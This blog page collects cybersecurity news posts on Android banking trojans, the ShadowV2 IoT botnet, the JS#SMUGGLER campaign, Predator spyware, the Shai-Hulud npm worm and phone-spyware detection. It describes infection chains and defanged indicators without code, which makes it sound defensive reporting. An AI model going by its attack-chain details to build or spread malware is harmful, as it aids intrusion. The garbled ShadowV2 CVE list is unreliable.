Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label malware. Show all posts
SeedSnatcher
Android ClayRat FvncBot malware SeedSnatcher

New Android Malware SeedSnatcher and FvncBot Found By Experts


New Android malware found

Researchers have revealed details of two Android malware strains called SeedSnatcher and FvncBot. Upgraded version of ClayRat was also found in the wild. 

About the malware 

FvncBot works as a security app built by mBank and attacks mobile banking users in Poland. The malware is written from scratch and is different from other banking trojans such as ERMAC whose source codes have been leaked.

According to Intel 471, the malware "implemented multiple features including keylogging by abusing Android's accessibility services, web-inject attacks, screen streaming and hidden virtual network computing (HVNC) to perform successful financial fraud."

Like the Albiriox banking malware, this trojan is shielded by a service called apk0day that Golden Crypt offers.

Attack tactic 

After the dropper app is launched, users are asked to download a Google Play component for security of the app. But in reality, it deploys the malware via session-based approach which other actors adopt to escape accessibility restrictions on Android devices version 13 and above.

According to Intel 471, "During the malware runtime, the log events were sent to the remote server at the naleymilva.it.com domain to track the current status of the bot." After this, the malware asks victims for accessibility services permission, it then gets privileges and connects to an external server. 

Malware capabilities 

FvncBot also triggers a text mode to analyze the device screen layout and content even in cases where an app doesn't allow screenshots by setting the FLAG_SECURE option. 

Experts don't yet know how FvncBot is getting widespread, but Android banking trojans leverage third-party app stores and SMS phishing as a distribution vector. 

According to Intel 471, "Android's accessibility service is intended to aid users with disabilities, but it also can give attackers the ability to know when certain apps are launched and overwrite the screen's display." 

The firm added that the sample was built to "target Polish-speaking users, it is plausible we will observe this theme shifting to target other regions or to impersonate other Polish institutions."


Beyond the immediate threat to banking and cryptocurrency users, the emergence of FvncBot, SeedSnatcher, and the upgraded ClayRat underscores a troubling evolution in mobile-malware design: an increasing shift toward “full-device takeover” rather than mere credential theft. By exploiting legitimate features, such as Android’s accessibility services, screen-streaming APIs, and overlay permissions, these trojans can invisibly hijack almost every function of a smartphone: logging keystrokes, intercepting SMS-delivered 2FA codes, capturing screen contents even when apps try to block screenshots, and executing arbitrary commands as though the real user were interacting with the device. 

This marks a new class of threat in which a compromised phone becomes a proxy tool for remote attackers: they don’t just steal data, they can impersonate the user, conduct fraudulent transactions, or monitor every digital activity. Hence, users worldwide, not only in Poland or crypto-heavy regions, must remain vigilant: the architecture these threats use is platform-wide, not region-specific, and could easily be repurposed for broader global campaigns.
Read more »
Vulnerability Exploits
AWS Cloud Outage Risks Cyber Threats DDOS Attacks Firmware Security IOT Security malware Mirai Network Defense ShadowV2 Botnet Vulnerability Exploits

ShadowV2 Botnet Activity Quietly Intensified During AWS Outage

 


The recently discovered wave of malicious activity has raised fresh concerns for cybersecurity analysts, who claim that ShadowV2 - a fast-evolving strain of malware that is quietly assembling a global network of compromised devices - is quietly causing alarm. It appears that the operation is based heavily upon Mirai's source code and is much more deliberate and calculated than previous variants. The operation is spread across more than 20 countries. 

Moreover, ShadowV2 has been determined to have been created by actors exploiting widespread misconfigurations in everyday Internet of Things hardware. This is an increasingly common weakness in modern digital ecosystems and it is aimed at building a resilient, stealthy, and scaleable botnet. The campaign was discovered by FortiGuard Labs during the Amazon Web Services disruption in late October, which the operators appeared to have been using to cover up their activity. 

During the outage, the malware spiked in activity, an activity investigators interpret to be the result of a controlled test run rather than an opportunistic attack, according to the report. During its analysis of devices from DDWRT (CVE-2009-2765), D-Link (CVE-2020-25506, CVE-2022-37055, CVE-2024-10914, CVE-2024-10915), DigiEver (CVE-2023-52163), TBK (CVE-2024-3721), TP-Link (CVE-2024-53375), and DigiEver (CVE-2024-53375), ShadowV2 was observed exploiting a wide range of CVE-2024-53375. 

A campaign’s ability to reach out across industries and geographies, coupled with its precise use of IoT flaws, is indicative of a maturing cybercriminal ecosystem, according to experts. This ecosystem is becoming increasingly adept at leveraging consumer-grade technology to stage sophisticated and coordinated attacks in the future. 

ShadowV2 exploited a variety of vulnerabilities that have been identified for a long time in IoT security, particularly in devices that have already been retired by manufacturers. This report, which is based on a research project conducted by NetSecFish, identified a number of vulnerabilities that could be affecting D-Link products that are at the end of their life cycle. 

The most concerning issue is CVE-2024-10914, which is a command-injection flaw affecting end-of-life D-Link products. In November 2024, a related issue, CVE-2024-10915, was found by researchers in a report published by NetSecFish. However, after finding no advisory, D-Link later confirmed that the affected devices had reached end of support and were unpatched. 

The vendor responded to inquiries by updating an existing bulletin to include the newly assigned CVE and issuing a further announcement that has directly related to the ShadowV2 campaign, reminding customers that outdated hardware will no longer receive security updates or maintenance, and that security updates will not be provided on them anymore. 

During the same period, a vulnerability exploited by the botnet, CVE-2024-53375, was revealed. This vulnerability has been reported to have been resolved through a beta firmware update. Considering that all of these lapses are occurring together, they serve as an excellent illustration of the fact that aging consumer devices continue to serve as a fertile ground for large-scale malicious operations long after support has ended, as many of these devices are left running even after support has ended. 

Based on the analysis of the campaign, it seems as though ShadowV2's operators use a familiar yet effective distribution chain to spread its popularity and reach as widely as possible. By exploiting a range of vulnerable IoT vulnerabilities, the attackers are able to download a software program known as binary.sh, which is located at 81[.]88[.]18[.]108, which is the command server's location. As soon as the script is executed, it fetches the ShadowV2 payload - every sample is identified by the Shadow prefix - which is similar to the well-known Mirai offshoot LZRD in many ways.

A recent study examining the x86-64 build of the malware, shadow.x86_64, has found that the malware initializes its configuration and attack routines by encoding them using a light-weight XOR-encoding algorithm, encrypting them with one byte (0x22) to protect file system paths, HTTP headers, and User-Agent strings using a single byte key. 

As soon as these parameters are decoded, the bot connects with its command-and-control server, where it waits for instructions on how to launch distributed denial-of-service attacks. While aesthetically modest in nature, this streamlined design is a reflection of a disciplined and purpose-built approach which makes it easy for deployment across diverse hardware systems without attracting attention right away. 

According to Fortinet, a deeper analysis of the malware—which uses XOR capabilities to encrypt configuration data and compact binaries—underscores that ShadowV2 shares many of the same features as the LZRD strain derived from Mirai. This allows ShadowV2 to minimize its visibility on compromised systems in a similar fashion. 

An infection sequence that has been observed across multiple incidents follows a consistent pattern: attackers are the ones who break into a vulnerable device, then they download the ShadowV2 payload via 81[.]88[.]18[.]108, and then they proceed to install it. The malware connects to its command server at silverpath[.]shadowstresser[.]info immediately after it has been installed, allowing it to be part of a distributed network geared towards coordinated attacks. 

Once installed, the malware immediately resides on the compromised device. In addition to supporting a wide range of DDoS techniques, including UDP, TCP, and HTTP, the botnet is well suited for high-volume denial-of-service operations, including those associated with for-hire DDoS services, criminal extortion, and targeted disruption campaigns. 

Researchers claim that ShadowV2's initial activity window may have been purposefully chosen to be the right time to conduct its initial operations. It is perfectly possible to test botnets at an early stage in the early stages of their development during major outages, such as the AWS disruption of late October, as sudden traffic irregularities are easily blended into the broader instability of the service. 

By targeting both consumer-grade and enterprise-grade IoT systems, operators seem to be building an attack fabric that is flexible and geographically diffuse, and capable of scaling rapidly, even in times of overwhelming defensive measures. While the observation was brief, analysts believe that it served as a controlled proof-of-concept that could be used to determine if a more expansive or destructive return could occur as a result of future widespread outages or high-profile international events. 

Fortinet has issued a warning for consumers and organizations to strengthen their defenses before similar operations occur in the future, in light of the implications of the campaign. In addition to installing the latest firmware on all supported IoT and networking devices, the company emphasizes the importance of decommissioning any end-of-life D-Link or other vendor devices, as well as preventing unnecessary internet-exposed features such as remote management and UPnP, to name just a few. 

Additionally, IoT hardware should be isolated within segmented networks, outbound traffic and DNS queries are monitored for anomalies, and strong, unique passwords should be enforced across all interfaces of all connected devices. As a whole, these measures aim to reduce the attack surface that has enabled the rapid emergence of IoT-driven botnets such as ShadowV2 to flourish. 

As for ShadowV2's activity, it has only been limited to the short window of the Amazon Web Services outage, but researchers stress that it should act as a timely reminder of the fragile state of global IoT security at the moment. During the campaign, it is stressed that the continued importance of protecting internet-connected devices, updating firmware regularly, and monitoring network activity for unfamiliar or high-volume traffic patterns that may signal an early compromise of those devices has been underscored. 

Defendants will benefit from an extensive set of indicators of compromise that Fortinet has released in order to assist them with proactive threat hunting, further supporting what researcher Li has described as an ongoing reality in cybersecurity: IoT hardware remains one of the most vulnerable entry points for cybercriminals. When ShadowV2 emerged, there was an even greater sense of concern when Microsoft disclosed just days later, days after its suspected test run, that Azure had been able to defend against what they called the largest cloud-based DDoS attack ever recorded. 

As a result of this attack, attributed to the Aisuru botnet, an unprecedented 15.72 Tbps was reached, resulting in nearly 3.64 billion packets per second being delivered. Despite the attack, Microsoft reported that it had successfully been absorbed by its cloud DDoS protection systems on October 24, thus preventing any disruptions to customer workflows. 

Analysts suggest that the timing of the two incidents indicates a rapidly intensifying threat landscape in which adversaries are increasingly preparing to launch large-scale attacks, often without much advance notice. Analysts are pointing out that the ShadowV2 incident is not merely an isolated event, but should also be considered a preview of what a more volatile era of botnet-driven disruption might look like once the dust settles on these consecutive warning shots. 

Due to the convergence of aging consumer hardware and incomplete patch ecosystems, as well as the increasing sophistication of adversaries, an overlooked device can become a launchpad for global-scale attacks as a result of this emergence. According to experts, real resilience will require more than reactive patching: settings that embed sustained visibility into their networks, enforcing strict asset lifecycle management, and incorporating architectures that limit the blast radius of inevitable compromises are all priorities that need to be addressed. 

Consumers also play a crucial role in preventing botnets from spreading by replacing unsupported devices, enabling automatic updates, and regularly reviewing router and Internet-of-Things configurations, which collectively help to reduce the number of vulnerable nodes available to botnets. 

In the face of attacks that demonstrate a clear willingness to demonstrate their capabilities during times of widespread disruption, cybersecurity experts warn that proactive preparedness must replace event-based preparedness as soon as possible. As they argue, the ShadowV2 incident serves as a timely reminder that strengthening the foundations of IoT security today is crucial to preventing much more disruptive campaigns from unfolding tomorrow.
Read more »
Netsupport Rat
Js#Smuggler Js#Smuggler Campaign malware Netsupport Rat

Researchers Warn of New Js#Smuggler Campaign Delivering Netsupport Rat through Compromised Websites

Cybersecurity researchers have sounded the alarm about a new malware campaign called JS#SMUGGLER, which is using hacked websites to distribute the NetSupport remote access trojan (RAT). Securonix analysed the attack method, describing it as a multi-stage sequence designed to evade detection and grant attackers full control of infected systems. 

The chain begins with an obfuscated JavaScript loader that is injected into a compromised website. It then progresses to an HTML Application (HTA) file that launches encrypted PowerShell stagers through the Windows tool mshta.exe, followed by a PowerShell payload that downloads the main RAT. 

According to researchers Akshay Gaikwad, Shikha Sangwan, and Aaron Beardslee, “NetSupport RAT enables full attacker control over the victim host, including remote desktop access, file operations, command execution, data theft and proxy capabilities.” 

There is currently no clear link to a specific threat group or country. The campaign targets enterprise users by redirecting them through infected websites, indicating broad targeting rather than a focused sector-specific effort. 

Securonix said the malware uses hidden iframes, scrambled JavaScript loaders and layered script execution. When a victim visits a compromised website, the injected script checks the device type. Mobile users are redirected to a full-screen iframe, while desktop users are sent to a second-stage malicious script. 

A tracking mechanism makes the payload fire only during the first visit to help avoid detection. The first-stage script builds the URL for the HTA payload at runtime and launches it using mshta.exe. The HTA file then runs a temporary PowerShell stager in memory. It disables visible window elements and removes itself afterwards to reduce digital traces. 

Once executed, the PowerShell payload downloads NetSupport RAT, giving the attacker remote control of the infected machine. Securonix called the campaign evidence of “a sophisticated and actively maintained malware framework.” 

The company advised defenders to use strong content security policies, script monitoring, PowerShell logging and restrictions on mshta.exe to detect similar activity. 

Additional findings show the JavaScript dropper also writes two more files to the TEMP directory: 

  • svchost.js, which installs a .NET loader known as DarkTortilla 
  • adobe.js, which drops PHat.jar, an MSI installer with similar behavior 

In the attack, the loader decrypts and runs an embedded DLL for the Formbook malware, a keylogger and an information stealer. Persistence is achieved by placing the payload in the Windows startup folder or adding entries to the Windows Registry. Securonix noted, “The threat actors combine social engineering, heavy script obfuscation and advanced .NET evasion techniques to successfully compromise targets.” 

The researchers added that reflective loading allows the final malware to run without storing it as a traditional file, which makes investigation more difficult. The disclosure follows recent research from the same firm about CHAMELEON#NET, another multi-stage malware campaign used to deliver Formbook via phishing messages. That campaign targeted the National Social Security sector and used fake webmail login pages and compressed archives to lure victims.
Read more »
WhatsApp Security
Albiriox Android Trojan malware User Privacy WhatsApp Security

Android Users Face New WhatsApp Malware Threat

 

Cybersecurity researchers at security firm Cleafy have issued a warning regarding a high risk malware campaign aimed at Android users via WhatsApp messages that could jeopardize users' cryptocurrency wallets and bank information. The researchers tracked the threat as Albiriox, a new emerging Android malware family being marketed as malware-as-a-service (MaaS) on underground cybercrime forums. 

Modus operandi 

The malware propagate through WhatsApp messages which include links to malicious websites that impersonate Google Play Store pages. Currently, they are impersonating a popular discount retail app, but this could quickly change both in terms of campaigns and targets. Rather than having the app delivered directly, victims are persuaded to submit their phone number, on the premise that an installation link will be sent to them on WhatsApp. 

After users tap on and download the trojanised app, Albiriox is able to take full control of the compromised device. The malware overlays attacks on more than 400 cryptocurrency wallet and banking apps — displaying fake login screens on top of the legitimate apps to capture credentials as users input them. 

Albiriox is an advanced, rapidly evolving malware. The malware also features Vnc-based remote access, which gives the attackers the ability to directly control the infected machines. Initially, campaigns were targeted at Austrian citizens with German-language messages, but is now broadening its reach. The malware is obfuscated with JSONPacker and also it tricks users into allowing the "Install Unknown Apps" permission. When it is running, it contacts its command servers through unencrypted TCP and stays on the bot forever, maintaining active control through a regular series of ping-pong heartbeat messages. 

Mitigation tips

Security experts emphasize that users should never agree to install apps through phone number submission on websites. Any WhatsApp messages requesting app installations should be immediately deleted without clicking links. This distribution method represents exactly why Google is strengthening measures against sideloading, requiring app developers to register and verify their identities.

Cleafy highlights that Albiriox demonstrates the ongoing evolution and increasing sophistication of mobile banking threats. However, users can protect themselves effectively by following several key practices: only install apps from the official Google Play Store, ensure Play Protect is activated, and remain skeptical of any unsolicited installation requests received through messaging apps. 

The campaign highlights broader security concerns affecting WhatsApp and similar platforms, particularly as attackers combine social engineering with technical malware capabilities to compromise both devices and accounts.
Read more »
WhatsApp malicious
Amnesty International report Intellexa Predator spyware malware Pakistan spyware attack Pegasus alternative WhatsApp malicious

Predator Spyware Targeting in Pakistan Exposed Through WhatsApp Link, Amnesty Report Reveals

 

A human rights attorney from Pakistan’s Balochistan region was recently sent a suspicious WhatsApp link from an unidentified number—an incident that Amnesty International says marks the first known targeting of a civil society actor in the country with Intellexa’s Predator spyware.

According to Amnesty, the URL displayed clear indicators of a "Predator attack attempt based on the technical behaviour of the infection server, and on specific characteristics of the one-time infection link which were consistent with previously observed Predator 1-click links." Pakistan has rejected the accusations, stating "there is not an iota of truth in it."

These revelations stem from a collaborative investigation involving Haaretz (Israel), Inside Story (Greece), and Inside IT (Switzerland). The findings are based on leaked company documents, internal communications, marketing materials, and training videos.

Intellexa, known for developing the mercenary spyware Predator, offers an advanced surveillance tool similar to NSO Group’s Pegasus. The product can clandestinely extract sensitive data from Android and iOS devices. Internal leaks indicate that Predator has also been branded under names such as Helios, Nova, Green Arrow, and Red Arrow.

To deploy the spyware, attackers commonly rely on malicious links sent through communication platforms. These links exploit undisclosed vulnerabilities through zero-click or one-click methods. If the intended target taps the link, a browser exploit in Google Chrome (Android) or Apple Safari (iOS) initiates access to the device, enabling the download of the main payload.

Google’s Threat Intelligence Group (GTIG) linked Intellexa to multiple zero-day exploits—either developed internally or purchased externally—including:
  • CVE-2025-48543 – Android Runtime UAF
  • CVE-2025-6554 – V8 Type Confusion (Chrome)
  • CVE-2023-41993 – WebKit JIT RCE
  • CVE-2023-41992 – Kernel IPC UAF
  • CVE-2023-41991 – Certificate validation bypass (Apple Security)
  • CVE-2024-4610 – Use-after-free in Arm GPU drivers
Several other historic V8 and Chrome vulnerabilities

In 2023, an iOS exploit chain deployed against individuals in Egypt combined CVE-2023-41993 with a framework called JSKit to run native code. GTIG noted the same exploit was used in a watering-hole attack linked to Russian state-backed hackers targeting Mongolian government websites, implying possible third-party supply of the exploits.

Google explained that "the JSKit framework is well maintained, supports a wide range of iOS versions, and is modular enough to support different Pointer Authentication Code (PAC) bypasses and code execution techniques." It can manually load and run Mach-O binaries directly from memory.

Once CVE-2023-41993 is abused, the attack escalates through CVE-2023-41991 and CVE-2023-41992 to escape Safari’s sandbox. This paves the way for a third-stage module known as PREYHUNTER. PREYHUNTER consists of:
  • Watcher: Monitors device behavior, ensuring the exploit remains undetected
  • Helper: Interfaces via a Unix socket to deploy hooks for keylogging, VoIP recording, and camera access
Intellexa also maintains a dedicated framework for exploiting Chrome’s V8 vulnerabilities, including CVE-2021-38003, CVE-2023-2033, CVE-2023-3079, CVE-2023-4762, and CVE-2025-6554, the last of which was reportedly used in Saudi Arabia in June 2025.

Once active on a device, Predator can extract data from messaging apps, calls, emails, location records, passwords, and screenshots. It can also activate the microphone for ambient audio recording and capture photos using the camera. All collected data is sent to servers inside the customer’s country.

Intellexa and several executives were sanctioned by the United States last year for creating and distributing the spyware, which authorities said undermines civil rights. Yet Predator infrastructure remains active in over a dozen countries, primarily in Africa, according to a June 2025 report by Recorded Future’s Insikt Group.

One of the most alarming disclosures is that Intellexa employees allegedly retained the ability to remotely access Predator systems hosted by its clients—including government installations—via TeamViewer.

Amnesty's Jurre van Bergen warned: "The fact that, at least in some cases, Intellexa appears to have retained the capability to remotely access Predator customer logs – allowing company staff to see details of surveillance operations and targeted individuals raises questions about its own human rights due diligence processes."

He added that if a spyware vendor is directly involved in operations, "it could potentially leave them open to claims of liability in cases of misuse and if any human rights abuses are caused by the use of spyware."

The report also outlines how Intellexa uses several delivery techniques that do not require targets to click malicious links. These include tools such as Triton (disclosed in 2023), Thor, and Oberon, along with remote delivery strategies that rely on internet or mobile networks.

Its three major strategic vectors include:
  • Mars and Jupiter – Network injection tools requiring cooperation between ISPs or mobile operators to perform adversary-in-the-middle (AitM) attacks using unencrypted HTTP traffic or intercepted domestic HTTPS traffic.
  • Aladdin – A zero-click technique that exploits mobile advertising by delivering a malicious ad that triggers infection automatically.
Amnesty noted: "The Aladdin system infects the target's phone by forcing a malicious advertisement created by the attacker to be shown on the target's phone."

Google confirmed it collaborated with partners to identify companies linked to Intellexa that operated within the ad ecosystem and to shut down those accounts.

Recorded Future separately identified two companies—Pulse Advertise and MorningStar TEC—suspected of managing ads tied to the Aladdin vector. The same report observed ongoing Predator infrastructure communication associated with customers in Saudi Arabia, Kazakhstan, Angola, and Mongolia.

Meanwhile, communication from Predator systems in Botswana, Trinidad and Tobago, and Egypt stopped around mid-2025. Recorded Future noted this could mean those governments ended their use of Predator—or alternatively shifted to new servers or infrastructure.

Read more »
spyware sanctions
global spyware operations Intellexa Iraq surveillance malware Predator spyware Recorded Future Insikt Group spyware sanctions

Intellexa Spyware Activity Appears to Slow in 2025, but New Research Suggests Broader Global Footprint

 

Despite U.S. sanctions imposed last year, the global footprint of Intellexa’s spyware operations may be larger and more elusive than previously believed, with researchers warning that shifting domain practices could be masking continued activity in 2025.

New research from Recorded Future’s Insikt Group reveals emerging evidence that Intellexa systems are currently being deployed in Iraq. The Record, which reported these findings, operates independently from Recorded Future.

Investigators also detected indicators “likely associated” with the use of Predator spyware by an entity connected to Pakistan. The report says it remains uncertain whether the intended targets were linked to Pakistan or if the operator was simply based within the country.

Intellexa, the creator of Predator spyware, has been at the center of global surveillance controversies, with its tools reportedly used against activists, journalists, and business leaders. Three former executives of the company are currently facing trial in Greece, where numerous victims of Predator surveillance have been identified.

The report also highlights ongoing Intellexa customer activity in Saudi Arabia, Kazakhstan, Angola, and Mongolia. Meanwhile, previous customers in Egypt, Botswana, and Trinidad and Tobago appear to have “ceased communication” since spring and summer — a shift that may reflect discontinued operations or a transition to new infrastructure.

A cluster linked to Mozambique, first identified earlier this year, continued functioning until at least late June 2025, according to the researchers.

This latest assessment builds on Insikt’s June report, which noted that Intellexa has repeatedly reconfigured its infrastructure in response to intensifying scrutiny — a strategy that complicates efforts to track its operations.

Researchers additionally uncovered several new companies suspected to be tied to Intellexa. Like many firms in the commercial spyware sector, Intellexa has long relied on shell companies and complex business networks to obscure its activities.

One newly identified company appears responsible for shipping Intellexa’s products to customers, while two more operate in the advertising sector and may be linked to a known infection vector that distributes spyware through online ads.

Two additional Intellexa-connected firms were traced to Kazakhstan and the Philippines, suggesting what researchers describe as an “expanding network footprint.”

Intellexa was added to the U.S. Commerce Department’s Entity List in July 2023, marking it as a threat to national security and foreign policy. In March 2024, the Commerce Department sanctioned founder Tal Jonathan Dilian, a former Israeli intelligence officer. Six months later, five more individuals and one affiliated entity were also sanctioned.

At the time, senior U.S. officials stressed the need for further action, pointing to Intellexa’s “opaque web of corporate entities, which are designed to avoid accountability.”

On Thursday, Amnesty International disclosed that Intellexa can remotely access Predator customer logs, allowing staff to view “details of surveillance operations and targeted individuals [which] raises questions about its own human rights due diligence processes,” according to Jurre van Bergen, Technologist at Amnesty’s Security Lab.

Van Bergen added: “If a mercenary spyware company is found to be directly involved in the operation of its product, then by human rights standards, it could potentially leave them open to claims of liability in cases of misuse and if any human rights abuses are caused by the use of spyware.”
Read more »
WhatsApp
Android Trojan Encrypted Chats malware Signal Sturnus WhatsApp

New Android Malware ‘Sturnus’ Bypasses Encrypted Messaging Protections

 

Researchers at MTI Security have unearthed a particularly advanced strain of Android malware called Sturnus, which threatens to compromise the data and security of mobile phone owners. The malware reportedly employs advanced interception techniques to capture data and circumvent even the best application-level encryption, making the security features of popular messaging apps like WhatsApp, Telegram and Signal pointless. 

The Sturnus malware does not need to crack encryption, according to MTI. Instead, it uses a sophisticated trick: the malware takes a screenshot once the messages have been decrypted for viewing.By exploiting a device’s ability to read the on-screen contents in real time, Sturnus can steal private message texts without leaving a trace. This means that scammers can access sensitive chats, and potentially collect personally identifiable information (PII) or financial data if shared in secure chats. 

In addition to message interception, Sturnus employs complex social engineering to steal credentials. The malware is capable to display fake login screens that looks like real banking apps, and can be very convincing. Users can inadvertently provide their information to the hackers if they use their login details on these fake sites. 

Sturnus can also simulate an Android system update screen, making the victim believe a normal update is being installed while malicious operations take place in the background. Perhaps most disturbingly, the researchers warn that Sturnus can also increase its privileges by tracking unlock attempts and recording device passwords or PINs. This allows the malware to gain root access which lets the attackers prevent the victims from removing the malicious code or regaining control of their devices. 

The majority of Sturnus infections detected so far are positively grouped in Southern and Central Europe, according to surveillance and analysis by the cybersecurity firm Threat Fabric. Such a restricted geography suggests that threat actors are still experimenting with the capabilities of the malware and the way it operates before potentially launching a worldwide campaign. 

Experts recommend users of Android to be cautious, refrain from downloading apps from unknown sources and be wary when asked accessibility or overlay permissions to apps they don’t know. But with its progress, Sturnus also exhibits the increasing complexity of Android malware and the difficulty in keeping users safe in a landscape of continuously evolving mobile threats.
Read more »
Spyware
Android Cyber Phishing Financial Data iOS malware Personal Information Spyware

How To Tell If Spyware Is Hiding On Your Phone And What To Do About It

 



Your smartphone stores personal conversations, financial data, photos, and daily movements. This concentration of information makes it attractive to attackers who rely on spyware. Spyware is malicious software that pretends to be a useful app while silently collecting information. It can arrive through phishing messages, deceptive downloads, fake mobile tools, or through legitimate apps that receive harmful updates. Even monitoring tools designed for parents or employers can be misused to track someone without their knowledge.

Spyware exists in multiple forms. One common category is nuisanceware, which appears with legitimate apps and focuses on showing unwanted ads, altering browser settings, and gathering browsing data for advertisers. Although it does not usually damage the device, it still disrupts user activity and profits from forced ad interactions. Broader mobile spyware goes further by pulling system information, clipboard content, login credentials, and data linked to financial accounts. These threats rely on tricking users through harmful emails, unsafe attachments, social media links, fake text messages, or direct physical access.

A more aggressive class of spyware overlaps with stalkerware and can monitor nearly every action on a victim’s device. These tools read messages across different platforms, intercept calls, capture audio from the environment, trigger the camera, take screenshots, log keystrokes, track travel routes, and target social media platforms. They are widely associated with domestic abuse because they allow continuous surveillance of a person’s communication and location. At the highest end is commercial spyware sold to governments. Tools like Pegasus have been used against journalists, activists, and political opponents, although everyday users are rarely targeted due to the high cost of these operations.

There are several early signs of an attempted spyware install. Strange emails, unexpected social media messages, or SMS alerts urging you to click a link are often the first step. Attackers frequently use urgent language to pressure victims into downloading malicious files, including fake delivery notices or warnings framed as bank or tax office messages. Sometimes these messages appear to come from a trusted contact. Stalkerware may require physical access, which means a phone that briefly goes missing and returns with new settings or apps could have been tampered with.

Once spyware is installed, your phone may behave differently. Rapid battery drain, overheating, sudden reboots, location settings turning on without reason, or a sharp increase in mobile data use can indicate that data is being transmitted secretly. Some variants can subscribe victims to paid services or trigger unauthorized financial activity. Even harmless apps can turn malicious through updates, so new problems after installing an app deserve attention.

On Android devices, users can review settings that control installations from outside official stores. This option usually appears in Settings > Security > Allow unknown sources, although the exact location depends on the manufacturer. Another path to inspect is Apps > Menu > Special Access > Install unknown apps, which lists anything permitted to install packages. This check is not completely reliable because many spyware apps avoid appearing in the standard app view.

Some spyware hides behind generic names and icons to blend in with normal tools such as calculators, calendars, utilities, or currency converters. If an unfamiliar app shows up, running a quick search can help determine whether it belongs to legitimate software.

For iPhones that are not jailbroken, infection is generally harder unless attackers exploit a zero-day or an unpatched flaw. Risks increase when users delay firmware updates or do not run routine security scans. While both platforms can show signs of compromise, sophisticated spyware may remain silent.

Some advanced surveillance tools operate without leaving noticeable symptoms. These strains can disguise themselves as system services and limit resource use to avoid attention.

Removing spyware is challenging because these tools are designed to persist. Most infections can be removed, but some cases may require a full device reset or, in extreme scenarios, replacing the device. Stalkerware operators may also receive alerts when their access is disrupted, and a sudden halt in data flow can signal removal.

If removing spyware could put someone at physical risk, they should avoid tampering with the device and involve law enforcement or relevant support groups.

Several approaches can help remove mobile spyware:

1. Run a malware scan: Reputable mobile antivirus tools can detect many common spyware families, though they may miss advanced variants.

2. Use dedicated removal tools: Specialized spyware removal software can help, but it must only be downloaded from trusted sources to avoid further infection.

3. Remove suspicious apps: Reviewing installed applications and deleting anything unfamiliar or unused may eliminate threats.

4. Check device administrator settings: Spyware may grant itself administrator rights. If such apps cannot be removed normally, a factory reset might be necessary.

5. Boot into Safe Mode: Safe Mode disables third-party apps temporarily, making removal easier, though advanced spyware may still persist.

6. Update the operating system: Patches often close security gaps that spyware relies on.


After discovering suspicious activity, users should take additional security steps. First, change passwords and enable biometrics: Resetting passwords on a separate device and enabling biometric locks strengthens account and device security. Secondly, create a new email address: A private email account can help regain control of linked services without alerting a stalkerware operator.

Advanced, commercial spyware demands stronger precautions. Research-based recommendations include:

• Reboot the device daily to disrupt attacks that rely on temporary exploits.

• Disable iMessage and FaceTime on iOS, as they are frequent targets for exploitation.

• Use alternative browsers such as Firefox Focus or Tor Browser to reduce exposure from browser-based exploits.

• Use a trusted VPN and jailbreak detection tools to protect against network and system-level intrusion.

• Use a separate secure device like those running GrapheneOS for sensitive communication.

Reducing the risk of future infections requires consistent precautions:

• Maintain physical device security through PINs, patterns, or biometrics.

• Install system updates as soon as they are released.

• Run antivirus scans regularly.

• Avoid apps from unofficial sources.

• Enable built-in security scanners for new installations.

• Review app permissions routinely and remove intrusive apps.

• Be cautious of suspicious links.

• Avoid jailbreaking the device.

• Enable multi-factor authentication, keeping in mind that spyware may still capture some verification codes.



Read more »
Shai-Hulud 2.0 worm
developer credentials JavaScript SDK compromise malware npm malware attack PostHog security breach Shai-Hulud 2.0 worm

PostHog Details “Most Impactful” Security Breach as Shai-Hulud 2.0 npm Worm Spreads Through JavaScript SDKs

 

PostHog has described the Shai-Hulud 2.0 npm worm incident as “the largest and most impactful security incident” the company has ever faced, after attackers managed to push tainted versions of its JavaScript SDKs and attempted to automatically harvest developer credentials.

In a recently published postmortem, PostHog — one of the affected maintainers caught up in the Shai-Hulud 2.0 outbreak — revealed that multiple packages, including core libraries such as posthog-node, posthog-js, and posthog-react-native, were compromised. The malicious versions included a pre-install script that ran the moment the package was added to a project. This script executed TruffleHog to search for secrets, exported any discovered credentials to newly created public GitHub repositories, and then used the stolen npm tokens to publish additional malicious updates, allowing the worm to continue spreading.

Researchers at Wiz, who identified the resurgence of the Shai-Hulud campaign, reported that more than 25,000 developers had their credentials exposed within just three days. Beyond PostHog, the malware also infiltrated packages from Zapier, AsyncAPI, ENS Domains, and Postman — many of which receive thousands of downloads every week.

Unlike a standard trojan, Shai-Hulud 2.0 operates like a fully autonomous worm. Once a compromised package is installed, it can collect a wide range of sensitive data — from npm and GitHub tokens to cloud provider credentials (AWS, Azure, GCP), CI/CD secrets, environment variables, and other confidential information found on developer machines or build environments. PostHog has since revoked all affected tokens, removed the infected package versions, and rolled out “known-good” releases.

However, the postmortem also underscored a deeper systemic flaw: the breach wasn’t caused by a leaked secret, but by a misconfigured CI/CD workflow that allowed untrusted pull-request code to execute with overly broad privileges. A malicious pull request triggered an automated script that ran with full access to the project. Because the workflow did not restrict execution of code from the attacker’s branch, the intruder was able to extract a bot’s personal-access token with organization-wide write permissions and use it to inject malicious updates.

Using the stolen credentials, the attacker created a tampered lint workflow designed to siphon all GitHub secrets — including the npm publishing token. With that token in hand, they uploaded the weaponized SDKs to npm, turning the infection into a self-propagating dependency-chain worm.

PostHog says it is now shifting to a “trusted publisher” model for npm releases, tightening workflow review processes, and disabling install-script execution in CI/CD pipelines, among other security improvements.

If this sounds all too familiar, that’s because it reflects a broader pattern across the ecosystem: over-privileged bots, automated workflows running unchecked, and dependency updates happening faster than anyone can thoroughly validate. As the incident shows, sometimes that’s all a worm needs to thrive.
Read more »
Phishing Attacks
Cybernews data security malware Phishing Attacks

More Breaches, More Risks: Experts say Protect Your Data Now

 

As data breaches surge, experts warn consumers to guard personal information before it reaches the dark web With data breaches becoming almost routine, more consumers are being forced to confront the risks of having their personal information exposed online. 

A recent US News survey found that 44 percent of respondents had received notices for multiple breaches involving their personal data. For many people, it now feels like another familiar company announces a breach every few days. Once stolen, this information typically ends up on the dark web, where it becomes a valuable resource for hackers, scammers, and cybercriminals. Breaches are only one pathway for data to be leaked. 

Clicking phishing links, entering details in viral social media quizzes, or having a device compromised by malware can all provide criminals with access to personal information that later circulates on underground forums. 

Dr. Darren Williams, founder and CEO of data privacy and ransomware protection company BlackFog, says the presence of some personal data on the dark web does not mean consumers should surrender to the problem. According to him, there are steps that can reduce exposure and protect information that has not yet been compromised. 

